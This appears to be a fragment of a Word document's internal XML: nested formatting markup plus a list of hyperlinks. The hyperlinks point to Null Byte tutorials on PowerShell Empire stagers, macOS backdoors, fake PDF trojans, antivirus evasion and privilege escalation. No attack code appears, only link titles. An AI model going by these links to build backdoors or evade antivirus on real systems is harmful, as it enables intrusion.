                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="680544495">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="209611901">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="845438783">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="2140100525">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1775783131">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="329067194">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="443303551">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="699284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674379">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1768768669">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1187518702">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1407386302">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="462581640">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1157723131">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1119758543">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="205145497">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="725687969">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="39278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linux-basics-for-aspiring-hacker-part-1-getting-started-0147121/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/create-fake-pdf-trojan-with-applescripts-part-1-creating-stager-0184692/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/61/14/63668865329556/0/636688653295566114.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/use-one-tclsh-command-bypass-antivirus-0186330/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-perform-privilege-escalation-part-1-file-permissions-abuse-0186331/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/use-powershell-empire-generating-stagers-for-post-exploitation-windows-hosts-0179939/"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img.wonderhowto.com/img/original/01/72/63662339329288/0/636623393292880172.jpg" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/evading-av-software/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/social-engineering/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/use-powershell-empire-getting-started-with-post-exploitation-windows-hosts-0178664/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/collection/powershell-empire/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/use-powershell-empire-getting-started-with-post-exploitation-windows-hosts-0178664/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-install-persistent-empire-backdoor-macbook-0184820/"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ull-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/white-hats-guide-choosing-virtual-private-server-018313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2019-03-14T14:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-22T21:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>